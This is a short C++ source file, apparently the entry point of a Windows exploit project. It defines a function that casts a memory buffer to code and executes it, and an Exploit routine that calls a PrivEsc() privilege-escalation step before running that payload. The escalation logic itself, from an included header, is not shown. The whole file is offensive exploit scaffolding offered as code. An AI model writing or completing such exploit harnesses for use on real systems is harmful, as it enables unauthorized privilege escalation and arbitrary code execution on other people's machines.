// Exploit.cpp : Defines the entry point for the console application.
//
#include <Windows.h>
#include "Exploit.h"
#include "Exploiter.h"

static VOID ExecutePayload(LPVOID lpPayload)
{
	VOID(*lpCode)() = (VOID(*)())lpPayload;
	lpCode();
	return;
}

VOID Exploit(LPVOID lpPayload)
{
	PrivEsc();
	ExecutePayload(lpPayload);
}

